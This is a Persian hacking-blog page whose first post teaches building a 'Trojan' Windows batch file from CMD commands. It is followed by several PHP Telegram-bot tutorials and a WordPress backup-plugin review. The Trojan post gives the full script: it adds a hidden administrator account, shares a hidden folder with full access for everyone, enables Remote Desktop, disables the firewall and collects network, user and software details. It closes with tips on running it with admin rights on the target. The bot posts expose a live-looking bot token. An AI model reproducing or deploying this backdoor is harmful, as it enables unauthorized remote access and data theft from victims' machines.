D E D S E C

تروجان نویسی با cmd

سلام به همه شما دوستان و همراهان همیشگی dedsec

در این آموزش، می خواهیم با فرمان های CMD یک Trojan ساده و بی درد سر بسازیم. تروجان ما فقط یک سری اطلاعات را برای ما جمع آوری می کند و راه دسترسی به آن اطلاعات و اطلاعات دیگر را هم فراهم می کند( بزودی براتون تروجان نویسی پیشرفته میزاریم). اگر دوست داشتید می توانید کارهای بیشتری را بر دوش این تروجان بگذارید. کل کارهایی که تروجان کوچولوی ما انجام می دهد به قرار زیر است:

تروجان ما چه کارهایی انجام می دهد؟

1. ایجاد یک User جدید با دسترسی Admin در کامپیوتر هدف

2. ایجاد یک پوشه مخفی در درایو ویندوز و Share کردن آن به صورت مخفی با دسترسی User جدید.

3. فعال کردن Sharing

4. فعال سازی قابلیت Remote Desktop در کامپیوتر هدف

5. خاموش کردن Password Protected File Sharing

6. خاموش کردن فایروال

7. جمع آوری اطلاعات کامپیوتر شامل موارد زیر:

IP ،Computer Name ، MAC Address ، لیست کاربران، لیست منابع Share شده

و انتقال آن ها به پوشه share شده در درایو ویندوز با نام همان کامپیوتر

8. لیست برنامه های نصب شده و ورژن آن در کامپیوتر هدف

قبل از شروع:

مواردی که در این مقاله گفته شده فقط جنبه آموزشی دارد و استفاده نادرست از آن به عهده کاربر است.

در این آموزش فقط از فرمان های CMD استفاده شده و از هیچ زبان برنامه نویسی و ابزار خاصی استفاده نشده است.

شروع ساخت Trojan

یک فایل Text ایجاد کنید و فرمان های زیر را در آن بنویسید:

1 – ایجاد یک User جدید با دسترسی Admin

Net user iman 123456 /add

Net localgroup administrators iman /add

2 – الف - ایجاد یک پوشه مخفی در درایو ویندوز

Mkdir c:\ded-folder

cd\

attrib ded-folder +h

2 – ب – Share کردن آن پوشه به صورت مخفی

net share trojan-share$=c:\ded-folder /grant:iman,full /grant:everyone,full

3 – فعال کردن File and Printer Sharing

netsh firewall set service type = fileandprint mode = enable

4 – فعال کردن Remote Desktop در کامپیوتر هدف

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

5 – به عهده شما ! ( می توانید این مورد را حذف کنید )

6 – خاموش کردن فایروال

Netsh advfirewall set allprofile state off

7 – گرفتن اطلاعات IP ، MAC Address ، لیست کاربران، لیست منابع Share و SID اکانت Administrator

ipconfig >>c:\ded-folder\%computername%.txt

getmac >>c:\ded-folder\%computername%.txt

net user >>c:\ded-folder\%computername%.txt

net share >>c:\ded-folder\%computername%.txt

wmic useraccount where name='administrator' get sid >>c:\ded-folder\%computername%.txt

8 – لیست برنامه های نصب شده بر روی سیستم هدف

Wmic product get name,version >> c:\ded-folder\%computername%.txt

9 - خب حالا عبارت @echo off را در اولین خط این فایل text قرار دهید.

10 - این فایل text را با نام dear-tro و پسوند .bat ذخیره کنید.

مرحله هیجان انگیز کار

برای اطمینان از این که Trojan کار می کند، یک بار آن را اجرا می کنیم.

همه فرمان ها با خطا روبرو می شوند!

چرا این اتفاق افتاد؟

چون فرمان هایی که در این Batch-file به کار بردیم برای اجرا شدن نیاز به دسترسی سطح Admin دارند.

حالا برای حلش چه کار کنیم؟

2 راه حل دارید!

روش اول:Batch-file را در کامپیوتر هدف Run as administrator کنید

روش دوم:UAC یا User Account Control را در پایین ترین سطح قرار دهید:

1. در استارت عبارت UAC را جستجو کنید.

2. Scroll را در پایین ترین سطح قرار دهید.

3. کامپیوتر را یک بار Restart کنید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

برنامه نویسی ربات تلگرام: قسمت چهارم

در قسمت‌های قبل با ربات تلگرام آشنا شدیم و یاد گرفتیم که چگونه به درخواست‌های کاربران پاسخ مناسب بدهیم. در این قسمت یعنی قسمت چهارم برنامه نویسی با php برای ربات تلگرام با ارسال عکس، صوت، فیلم، مستندات، استیکر، موقعیت مکانی، کارت دعوت، اطلاعات تماس و وضعیت فعالیت بات آشنا می‌شویم.

ارسال تصاویر برای بات تلگرام با متد sendPhoto:

برای ارسال عکس با ربات تلگرام از متد sendPhoto استفاده می‌کنیم. متد sendPhoto تصویر را با استفاده از POST برای کاربر ارسال می‌کند. در مثال زیر با CURL کار ارسال را انجام می‌دهیم:

$url= "https://api.telegram.org/bot".$token."/sendPhoto?chat_id=".$chat_id;
$post = array(
    'photo'     => new CURLFile(realpath("dedsec.jpg"))
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);

دستورات بالا عکس موجود در ریشه جاری با نام dedsec.jpg را به کاربر ارسال می‌کند.

می توان زیر تصاویر متنی برای توضیح ارسال کرد. برای ارسال این مقدار از پارامتر caption به شکل زیر استفاده می‌کنیم:

$url= "https://api.telegram.org/bot".$token."/sendPhoto?chat_id=".$chat_id."&caption=متن کپشن";

ارسال تصاویر برای بات تلگرام با متد sendAudio:

ارسال صوت در تلگرام شبیه ارسال تصویر است. در زیر مثالی از استفاده از این متد مشاهده می‌کنید:

$url= "https://api.telegram.org/bot".$token."/sendAudio?chat_id=".$chat_id;
$post = array(
    'audio'     => new CURLFile(realpath("dedsec.mp3"))
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);

در بالا مانند sendPhoto فایل صوتی خود را با curl و متد پست ارسال می‌کنیم.

متد sendAudio پارامتر‌های اختیاری زیر را دارد:

caption: متن توضیح زیر فایل صوتی را تعیین می‌کند.
duration: طول مدت Track صوتی را به ثانیه دریافت می‌کند.
performer: نام اجرا کننده Track صوتی (مثلا نام خواننده)
title: نام Track صوتی

نکته: محدودیت حجمی ارسال فایل‌های صوتی با بات تلگرام 50 مگابایت است.

ارسال فیلم برای بات تلگرام با متد sendVideo:

بهترین حالت ارسال فیلم برای بات تلگرام ارسال فیلم با فرمت mp4 است. هر چند که فرمت‌های دیگر نیز ممکن است ارسال شوند. اگر از فرمت خاصی استفاده کنید که تلگرام امکان ارسال آن به عنوان video را نداشته باشد خود تلگرام آن را به عنوان document ارسال می‌کند:

$url= "https://api.telegram.org/bot".$token."/sendVideo?chat_id=".$chat_id;
$post = array(
        'video'     => new CURLFile(realpath("dedsec.mp4"))
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);

ارسال مستندات برای بات تلگرام با متد sendDocument:

مثالی از ارسال مستندات با بات تلگرام را در زیر می‌بینید:

$url= "https://api.telegram.org/bot".$token."/sendDocument?chat_id=".$chat_id;

برای متد sendDocument نیز می‌توان caption ارسال کرد.

نکته: محدودیت حجمی ارسال مستندات با بات تلگرام 50 مگابایت است.

ارسال استیکر برای بات تلگرام با متد sendSticker:

فرمت پیشنهادی تلگرام برای ارسال استیکر فرمت webp است. اگر تصاویر خود را با این فرمت به عنوان استیکر ارسال کنید خروجی کار بهتر خواهد بود، هر چند می‌توان عکس‌هایی با فرمت‌های دیگر را نیز ارسال کرد.

اگر تصویری با فرمت‌های رایج دارید و می‌خواهید به webp تبدیل کنید از این سایت استفاده کنید.

$url= "https://api.telegram.org/bot".$token."/sendSticker?chat_id=".$chat_id;
$post = array(
        'sticker'     => new CURLFile(realpath("dedsec.webp"))
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url); 
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);

ارسال موقعیت برای بات تلگرام با متد sendLocation:

در این متد با داشتن طول و عرض موقعیت جغرافیایی یک عکس و لینک از آدرس محل مورد نظر برای کاربر ارسال می‌شود:

$url= "https://api.telegram.org/bot".$token."/sendLocation?chat_id=".$chat_id."&latitude=37.7576793&longitude=-122.5076402";
file_get_contents($url);

ارسال کارت دعوت برای بات تلگرام با متد sendVenue:

این متد بسیار شبیه sendLocation است با این تفاوت که عنوان و آدرس نیز می‌توان به آن اضافه کرد:

$url= "https://api.telegram.org/bot".$token."/sendVenue?chat_id=".$chat_id."&latitude=37.7576793&longitude=-122.5076402&title=عنوان&address=آدرس";
file_get_contents($url);

ارسال مشخصات تماس برای بات تلگرام با متد sendContact:

متد فوق بسیار ساده است، شماره، نام و نام خانوادگی مشترک را دریافت و مشخصات تماس را برای کاربر ارسال می‌کند:

$url= "https://api.telegram.org/bot".$token."/sendContact?chat_id=".$chat_id."&phone_number=09122222222&first_name=dedsec-hack.blog&last_name=.ir";
file_get_contents($url);

ارسال وضعیت عملکرد بات برای بات تلگرام با متد sendChatAction:

متد فوق کارکرد جالبی دارد، فرض کنید قرار است با بات برای کاربر ویدیو حجیمی بفرستید مدت زمانی که کاربر صبر می‌کند تا ویدیو به دستش برسد جالب است که متن sending a video"" برای کاربر نمایش داده شود و پس از آن کلیپ ویدیو به نمایش درآید:

$url= "https://api.telegram.org/bot".$token."/sendChatAction?chat_id=".$chat_id."&action=upload_video";
file_get_contents($url);

$url= "https://api.telegram.org/bot".$token."/sendVideo?chat_id=".$chat_id;
$post = array(
'video'     => new CURLFile(realpath("dedsec.mp4"))
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
curl_exec($ch);

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

برنامه نویسی ربات تلگرام: قسمت سوم

در قسمت‌های اول و دوم از این آموزش با ربات‌های تلگرام بیشتر آشنا شدیم و توانستیم یک ربات ساده برای نمایش درباره ما برنامه نویسی کنیم. در این قسمت برنامه‌ای می‌نویسیم که برای کاربر یک کیبورد نمایش دهد.

در این قسمت از آموزش قصد داریم کیبوردی از نام شعرای ایرانی را نمایش داده که وقتی روی نام شاعر کلیک شود بیتی از آن شاعر نمایش داده شود.

برای شروع در botFather کامند poems را اضافه می‌کنیم:

برای ارسال کیبورد به کاربر از متد sendMessage استفاده می‌کنیم و پارامتر text و reply_markup را برای آن ارسال می‌کنیم. پارامتر text پیام مناسب کیبورد را برای کاربر ارسال می‌کند؛ و Replay_markup آرایه‌ای است که مقادیر کیبورد را ارسال می‌کند.

سورس قبلی را که برای مشاهده متن درباره ما بود به شکل زیر تغییر می‌دهیم:

<?php
header('Content-Type: text/html; charset=utf-8');
$message= file_get_contents("php://input");
$arrayMessage= json_decode($message, true);

$token= "249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w";
$chat_id= $arrayMessage['message']['from']['id'];
$command= $arrayMessage['message']['text'];

if($command == '/start'){
    $text= "سلام، به ربات ما خوش آمدید";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);    
}else if($command == '/aboutus'){
    $text= "این یک متن درباره ماست";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);
}else if($command == '/poems'){
    $poets= array(
        'keyboard' => array(
                array('/Ferdowsi', '/Mawlawi', '/Hafez', '/Rudaki')
            ),
        );
    $jsonPoets= json_encode($poets);
    $text= "نام یکی از شعرای بزرگ ایرانی را انتخاب کنید";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text."&reply_markup=".$jsonPoets;
    file_get_contents($url);
}else{
    $text= "دستور نا معتبر است";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);
}

اگر این فایل را به هاست خود منتقل کنید مشاهده خواهید کرد که کاربر به محض کلیک روی poems یک کیبورد چهار کلیده با نام‌های سه شاعر ایرانی مشاهده می‌کند.

در این مرحله ما چهار کامند جدید /Rudaki و /Hafez و /Mawlawi و /Ferdowsi داریم که هر کدام یک بیت شعر را به کاربر نمایش می‌دهد.

اگر سورس بالا را چک کنید متوجه می‌شوید بعد از کلیک بر روی نام شاعر و نمایش بیت شعر مرتبط کیبورد باز ظاهر می‌ماند. برای مخفی کردن کیبورد پس از نمایش بیت شعر باید یک آرایه hide_keyboard => true ایجاد می‌کنیم و آن را ضمیمه url نمایش بیت شعر می‌کنیم:

}else if($command == "/Ferdowsi"){
    $text= "خردمند باش وبی آزارباش     همیشه زبانرا نگهدار باش";
    $hide_keyboard= json_encode(array('hide_keyboard' => true));
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text."&reply_markup=".$hide_keyboard;
    file_get_contents($url);
}

در سطر 9 متغیر hide_keyboard آرایه‌ای دارد که با ارسال آن کیبورد بسته می‌شود.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

ساخت ربات تلگرام : قسمت دوم

در قسمت قبل از آموزش با ربات‌های تلگرام و ایجاد ربات با Bot Father آشنا شدیم. در این آموزش کار را با برنامه نویسی به زبان PHP برای این ربات پیش می‌بریم.

برای ارتباط با ربات تلگرام دو متد وجود دارد. متد setWebhook و متد getUpdates.

متد setWebhook برای ارتباط با تلگرام:

این متد برای دریافت اطلاعات به صورت بلادرنگ است. به این معنی که هر وقت کاربری از ربات شما اطلاعاتی درخواست کرد، سرور تلگرام سریعا به هاست شما متصل شده و درخواست کاربر را به شما اطلاع می‌دهد.

مزیت بلادرنگ بودن، مزیتی مهم است که یک پیشنیاز دارد و آن هم داشتن دامنه‌ای با https است

متد getUpdates برای ارتباط با تلگرام:

در این متد درخواست‌های کاربران در سرور تلگرام ذخیره شده و ما باید در بازه‌های زمانی کوتاه از سرور تلگرام درخواست‌های کاربران را دریافت کنیم. مزیتی که این روش نسبت به setWebhook دارد در این است که نیازی به داشتن هاست یا سرور با https نداریم.

در ادامه هر دو متد را با هم بررسی می‌کنیم.

ابتدا مثالی از فعال کردن روش setWebhook بیان می‌کنیم. با الگوی زیر یک URL ساخته و آن را در مرورگر خود وارد می‌کنیم:

https://api.telegram.org/bot[TOKEN]/setWebhook?url=[URL]

در مثال فوق Token ربات خود را در [TOKEN] و آدرس فایل برنامه نویسی شده ارتباط با ربات در [URL] قرار می‌گیرد.

مثالی از پیاده سازی الگوی فوق:

https://api.telegram.org/bot249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w/setWebhook?url=https://dedsec-hack.blog.ir/test/tlg.php

اگر دستور فوق را در مرورگر خود وارد کنیم با پیغامی مانند زیر دریافت می‌کنیم:

{"ok":true,"result":true,"description":"Webhook was set"}

پیغام فوق یک آرایه JSON است که بیان می‌کند webhook با موفقیت ثبت شده است. وقتی عملیات webhook با موفقیت انجام شود سرور تلگرام تمامی درخواست‌های کاربران را به url‌ای که برای تلگرام اعلام کردیم ارسال می‌کند.

برای حذف کردن این webhook پارامتر [URL] را حذف کرده و در خواست را دوباره با مرورگر ارسال می‌کنیم:

https://api.telegram.org/bot249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w/setWebhook

الگوی پایین برای دریافت آخرین ارسال‌ها با کمک متد getUpdates است:

https://api.telegram.org/bot[TOKEN]/getupdates

مثال استفاده از این متد:

https://api.telegram.org/bot249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w/getupdates

اگر این آدرس را درخواست دهیم، چیزی مشابه نتیجه زیر به نمایش در می‌آید:

{"ok":true,"result":[{"update_id":818742452,
"message":{"message_id":19,"from":{"id":156173107,"first_name":"the code","username":"dedsec"},"chat":{"id":156173107,"first_name":"the code","username":"dedsec","type":"private"},"date":1471866230,"text":"\/aboutus","entities":[{"type":"bot_command","offset":0,"length":8}]}}]}

در بالا یک آرایه json از کل پیغام‌ها دریافت کردیم.

در ادامه قصد داریم عملیات دریافت اطلاعات با متد getupdate را با ذکر یک مثال به طور کامل شرح دهیم:

header('Content-Type: text/html; charset=utf-8');
$token= "249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w";
$url= "https://api.telegram.org/bot".$token."/getupdates";
$update= file_get_contents($url);
$arrayUpdate= json_decode($update, true);
var_dump($arrayUpdate);

در اولین سطر از هدر utf-8 استفاده کردیم تا بتوانیم رشته‌های فارسی را مشاهده کنیم.

با دستورات فوق عملیات دریافت update را با زبان php انجام دادیم. برای تمرین برای ربات خود متن بفرستید و با getUpdate پیغام‌ها را دریافت کنید. اگر در متن اسکریپت دریافتی از getUpdate دقت کنید خواهید دید username و نام کاربر و دستوراتی را که درخواست داده است را می‌توانید مشاهده کنید.
در پایین دستوراتی برای پیمایش پیغام‌ها مشاهده می‌کنید:

header('Content-Type: text/html; charset=utf-8');
$token= "249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w";
$url= "https://api.telegram.org/bot".$token."/getupdates";
$update= file_get_contents($url);
$arrayUpdate= json_decode($update, true);
foreach ($arrayUpdate['result'] as $key) {
    echo "update_id: ".$key['update_id']."<br>";
    echo "user name: ".$key['message']['from']['username']."<br>";
    echo "first name: ".$key['message']['from']['first_name']."<br>";
    echo "text: ".$key['message']['text']."<br>";
    echo "<br><br><br><br>";
}

نکته: قبلا از استفاده از getUpdate حتما getWebHook را غیر فعال کنید.

استفاده از متد getWebHook برای برنامه نویسی ربات:

در فوق برای استفاده از getUpdates باید این متد را در فواصل زمانی کوتاه با CronJob اجرا کنیم تا بتوانیم با کاربران در ارتباط باشیم. هر چند که گاهی ممکن است پاسخ دیر به کاربر برسد.

در پایین آموزش را با getWebHook ادامه می‌دهیم، هر چند که حتی اگر شما از getUpdates استفاده تفاوت چندانی در اسکریپت‌ها وجود ندارد.

همانند اول آموزش با آدرس زیر فایل tlp.php را به عنوان اسکریپت دریافت کننده پیام‌های کاربران معرفی می‌کنیم:

https://api.telegram.org/bot249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w/setWebhook?url=https://dedsec-hack.blog.ir/test/tlg.php

سورسی که در پیش رو دارید فایل tlg.php هاست است:

$message= file_get_contents("php://input");
file_put_contents("message.txt", $message);

تلگرام پیغام‌ها را با متد POST برای فایل معرفی شده با getwebhook ارسال می‌کند. برای یافتن متدهای موجود در پیغام ارسالی به فایل tlg.php سورس بالا را استفاده می‌کنیم. "php://input" کل پارامترهای دریافتی از post را دریافت می‌کند. در نهایت اطلاعات دریافتی در فایلی به نام message.txt در مسیر جاری ذخیره می‌شود. در پایین این مقدار خروجی را مشاهده می‌کنید:

{"update_id":818742456,
"message":{"message_id":23,"from":{"id":156173107,"first_name":"the code","username":"dedsec"},"chat":{"id":156173107,"first_name":"the code","username":"dedsec","type":"private"},"date":1471875367,"text":"\/aboutus","entities":[{"type":"bot_command","offset":0,"length":8}]}}

با بررسی این رشته JSON به ساختار زیر دست پیدا می‌کنیم:

header('Content-Type: text/html; charset=utf-8');
$message= '{"update_id":818742457,
"message":{"message_id":24,"from":{"id":156173107,"first_name":"the code","username":"dedsec"},"chat":{"id":156173107,"first_name":"the code","username":"dedsec","type":"private"},"date":1471876469,"text":"\/aboutus","entities":[{"type":"bot_command","offset":0,"length":8}]}}';
$message= json_decode($message, true);
echo "update_id: ".$message['update_id']."<br>";
echo "user name: ".$message['message']['from']['username']."<br>";
echo "first name: ".$message['message']['from']['first_name']."<br>";
echo "text: ".$message['message']['text']."<br>";
echo "<br><br><br><br>";

خروجی سورس بالا:

update_id: 818742457
user name: dedsec
first name: the code
text: /aboutus

آشنایی با متد sendMessage:

متد sendMessage کار ارسال به کاربر را انجام می‌دهد:

https://api.telegram.org/bot[TOKEN]/sendMessage?chat_id=[CHAT_ID]&text=[TEXT]

در پایین سورس فایل tlg.php را به گونه‌ای تغییر می‌دهیم که پس از دریافت کاربر پاسخ مناسب را بدهد:

header('Content-Type: text/html; charset=utf-8');
$message= file_get_contents("php://input");
$arrayMessage= json_decode($message, true);
$token= "249879980:AAHNdWnXjdq6Fw17NF81xXTtjA3xs19Sc6w";
$chat_id= $arrayMessage['message']['from']['id'];
$command= $arrayMessage['message']['text'];

if($command == '/start'){
    $text= "سلام، به ربات ما خوش آمدید";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);
}else if($command == '/aboutus'){
    $text= "این متن برای آشنایی شما با ماست";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);
}else{
    $text= "دستور شما نا معتبر است";
    $url= "https://api.telegram.org/bot".$token."/sendMessage?chat_id=".$chat_id."&text=".$text;
    file_get_contents($url);
}

دستور بالا به سادگی ابتدا پیام کاربر را دریافت، از آن chat_id و command را دریافت می‌کند و url مناسب را برای ارسال پیام به کاربر می‌سازد.

نکته: کامند /start در تمامی روبات‌ها به صورت پیشفرض وجود دارد، پس بهتر است برای آن یک متن نمایشی پیش فرض ایجاد کنیم.

نکته: البته شرطی هم در سورس وجود دارد که برای پاسخ دهی به دستورات نا معتبر است.

همانطور که در بالا دیدید می‌توانید کامندهای دیگری برای بات خود تعریف کنید و برای هر کامند دستورات مناسب را ایجاد کنید.

اگر در نوشتن برنامه خود مشکل دارید سوالات خود را در بخش نظرات درج کنید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

برنامه نویسی ربات تلگرام: قسمت اول

ربات تلگرام ابزاری است اهداف تجاری، خدماتی، امنیتی، تفریحی و آموزشی. در این سلسله آموزش علاوه بر آشنایی با ربات تلگرام یاد می‌گیریم چگونه با زبان قدرتمند php یک ربات هوشمند تلگرام راه اندازی کنیم.

تفاوتی ندارد از چه زبان برنامه نویسی‌ای استفاده می‌کنید، اگر این آموزش را تا آخر دنبال کنید می‌توانید با هر زبان برنامه نویسی یک ربات هوشمند برای تلگرام خود بسازید.

تلگرام برای کمک به برنامه نویسان یک API جامع و کاربردی آماده کرده است که به برنامه نویسان امکان توسعه نرم افزارهای مفید برای تلگرام را می‌دهد.

ربات‌ها در ظاهر مانند تماس‌های ساده در تلگرام لیست می‌شوند ولی در باطن تفاوت‌های اساسی با تماس‌های متداول تلگرامی دارند. طبیعتا ربات‌های تلگرام بر عکس تماس‌های تلگرام آخرین زمان آنلاین شدن را نشان نمی‌دهند و در نهایت اسم خود واژه bot را شامل می‌شوند.

همیشه مد نظر داشته باشید که ربات‌ها تنها با کسانی ارتباط برقرار می‌کنند که به آن‌ها اجازه فعالیت داده باشند.

معرفی چند ربات تلگرام

قرآن: این ربات قرآنی بسیار جالب و قدرتمند است. این ربات امکان دریافت یک آیه به صورت تصادفی به همراه ترجمه و صوت را دارد. همچنین می‌توانید آیه‌ای را برای آن مشخص کنید و ترجمه و صوت آن را دریافت کنید.

نهج البلاغه: ربات مذهبی نهج البلاغه

ربات توکان: ربات دریافت نرخ ارز، اطلاعات ورزشی، اوقات شرعی، جستجو در وب و.

ربات عماد خان: ربات سرگرمی با قابلیت‌های فراوان

واژه یاب: ربات ترجمه لغات انگلیسی به فارسی، جستجوی واژه نامه‌های فارسی به فارسی

اینستاگیر: ربات دانلود تصاویر اینستاگرام

اطلاعات 118 در تلگرام: ربات اطلاعات 118 به تفکیک شهرها

ربات‌های فوق ربات‌هایی هستند که امکانات مجانی و کاربردی در اختیار کاربران می‌گذارند. برای اهداف تجاری می‌توان ربات‌های پولی هم تولید و از این طریق کسب درامد کرد.

Bot Fahter (بابا بات)

بابا بات، botfather

این ربات توسط شرکت تلگرام ایجاد شده است و برای ایجاد ربات‌ها مورد استفاده قرار می‌گیرد. برای دستیابی به این ربات از این لینک استفاده کنید.

BotFather یک ربات رسمی است. همیشه در هنگام استفاده از ربات‌های رسمی تلگرام توجه کنید که یک آی آبی رنگ هشت گوش در کنار نام آن وجود داشته باشد.

اگر بر روی کلید start کلیک کنید می‌توانید لیست کامندهای لازم برای مدیریت ربات را مشاهده کنید. اولین کامند، /newbot است که با استفاده از آن می‌توان ربات تلگرام جدید را ایجاد کرد.

ابتدا روی /newbot کلیک کرده، سپس نام ربات خود را وارد کرده، در مرحله بعدی یک یوزرنیم که به واژه bot ختم می‌شود را وارد می‌کنیم. اگر نام کاربری تکراری نباشد این نام پذیرفته شده و مراحل با موفقیت به پایان می‌یابد. البته توجه کنید در پیام تبریک موفقیت ثبت بات غیر از آدرس دسترسی به ربات یک token برای دسترسی به ربات نیز به کاربر نمایش داده می‌شود که باید آن را برای برنامه نویسی‌های بعدی ذخیره کرد.

آشنایی با کامندهای مطرح BotFather

/token: با استفاده از این دستور token ربات شما نمایش داده می‌شود.

/revoke: با این دستور token قبلی شما از بین رفته و یک token جدید برایتان ساخته می‌شود.

/setname: این دستور را وقتی وارد کنید لیستی از ربات‌های ایجاد شده توسط خودتان را می‌بینید که روی هر کدام کلیک کنید می‌توانید نام ربات خود را تغییر دهید.

/setdescription: با این دستور می‌توانید توضیحاتی به ربات خود اضافه کنید که هنگام اضافه کردن ربات به کاربر نمایش داده می‌شود. این توضیحات می‌توانند حداکثر 512 کاراکتر باشند.

/setabouttext: این دستور توضیحات ربات را در صفحه پروفایل دریافت می‌کند. این توضیحات نباید بیشتر از 120 کاراکتر باشند.

/setuserpic: برای اضافه کردن عکس به ربات مورد استفاده قرار می‌گیرد.

/setcommands: برای تعریف کامندهای مخصوص ربات از این دستور استفاده می‌کنیم. طبق توضیحات داده شده در خود تلگرام باید کامند را به شکل زیر تعیین کنیم:

command – description

مثال:

aboutus – آشنایی با ما

برای مشاهده تغییرات در بات تلگرام خود Clear history کنید.

پس از اجرای بات خود کامند aboutus را مشاهده می‌کنید که کار خاصی انجام نمی‌دهد و در بخش‌های بعدی و مباحث برنامه نویسی برای ربات تلگرام باید با این مبحث آشنا شوید.

dedsec will give you the truth

join us

مشخصات

جهت مشاهده منبع اصلی و ادامه این مطلب این مطلب کلیک کنید

آموزش پشتیبان گیری از وردپرس

بهترین کاری که می‌توانید برای وب‌سایت وردپرس انجام دهید، پشتیبان‌گیری منظم و دوره‌ای از آن است. نسخه‌های پشتیبان به شما امنیت خاطر داده و شما را از شرایط فاجعه بار (مثلاً هنگامی‌که سایت هک شده باشه یا تصادفاً دسترسی خودتان را محدود کرده باشید) نجات میدهند. وردپرس تعدادی افزونه‌ی رایگان و پولی دارد که استفاده از اکثر آن‌ها نسبتاً آسان است. در این مقاله 7 افزونه‌ی برتر وردپرس را معرفی می‌کنیم.

نکته‌ی مهم: بسیاری از ارائه‌دهنده‌های خدمات میزبانی فضای وب، سرویس‌های پشتیبان‌گیری را به شما ارائه می‌دهند، ولی همیشه به این نکته توجه داشته باشید که پشتیبان‌گیری از سایت، وظیفه‌ی خود شماست. و برای پشتیبان‌گیری به ارائه‌دهنده‌های خدمات میزبانی تکیه نکنید.

اگه تا به حال از سایت، پشتیبان‌گیری نکرده‌اید، باید یکی از این 7 افزونه‌ی برتر پشتیبان‌گیری وردپردس را انتخاب کرده و همین الان از آن استفاده کنید.

1- افزونه پشتیبان گیری BackupBuddy

نرم افزار پشتیبان گیری backupbuddy

BackupBuddy، محبوب‌ترین افزونه‌ی پشتیبان‌گیری وردپرس است. این افزونه این امکان را برای شما فراهم می‌کند تا به آسانی عملیات پشتیبان‌گیری را بصورت روزانه، هفتگی یا ماهانه زمان‌بندی کنید. همچنین این افزونه نسخه‌ی پشتیبان را بصورت اتوماتیک در یکی از سرویس‌های زیر ذخیره می‌کند:

Dropbox
Amazon S3
Rackspace Cloud
FTP Stlash
Email

اگر از سرویسِ Stash استفاده کنید، می‌توانید عملیات‌های پشتیبان‌گیری را بصورت reat time انجام دهید.

بزرگ‌ترین مزیت استفاده از BackupBuddy، این است که مبتنی بر سرویس‌های اشتراکی نیست بنابراین نیازی به پرداخت هزینه‌های ماهانه نیست. می‌توانید از این افزونه به تعداد سایت‌هایی که در طرح مربوط به خودتان ذکر شده استفاده کنید.

همچنین به انجمن‌های حمایتی، به‌روز رسانی‌های دوره‌ای و 1GB فضای ذخیره‌سازی در cloud برای ذخیره‌ی پشتیبان‌ها نیز دسترسی خواهید داشت.

می‌توانید برای کپی کردن، انتقال یا بازیابی وب‌سایت‌ها هم از BackupBuddy استفاده کنید.

2- افزونه پشتیبان گیری رایگان و قدرتمند UpdraftPlus

پشتیبان گیری از وردپرس updraftplus

UpdraftPlus یک افزونه‌ی پشتیبان‌گیری رایگان است. این افزونه این امکان را به شما می‌دهد تا پشتیبان‌های کاملی از سایتِ وردپرس گرفته و آن‌ها را در cloud یا در کامپیوترتان ذخیره کنید.

این افزونه از زمانبندی پشتیبان‌گیری هم پشتیبانی می‌کند. می‌توانید فایل‌هایی که می‌خواهید از آن‌ها نسخه‌ی پشتیبان تهیه کنید را هم انتخاب کنید. این افزونه، بصورت اتوماتیک فایل‌های پشتیبان‌ را در هر سرویس ابری ذخیره می‌کند.

همچنین UpdraftPlus یک نسخه‌ی پریمیوم به همراه add-ons، جهت انتقال یا clone کردن سایت، جستجوی پایگاه داده و جایگزینی، پشتیبانی از مولتی‌سایت و . دارد.

3- افزونه رایگان BackWPUp

پشتیبان گیری حرفه‌ای از وردپرس backwpup

BackWPUp افزونه‌ی رایگانی است که این امکان را به شما می‌دهد تا بتوانید بصورت رایگان از سایتِ وردپرس نسخه‌ی پشتیبانِ کاملی تهیه کرده و آن را در هر سیستم ابری‌ای ذخیره کنید.

استفاده از این افزونه بسیار آسان بوده و امکان زمان‌بندی اتوماتیک پشتیبان‌گیری بر اساس تعداد دفعات بروزرسانی هم وجود دارد.

بازیابی سایت وردپرس از طریق نسخه‌ی پشتیبان بسیار ساده است. ورژنِ BackWPup Pro از ذخیره‌سازی نسخه‌های پشتیبان در Google Drive و تعدادی ویژگی فوق‌العاده‌ی دیگر نیز پشتیبانی می‌کند.

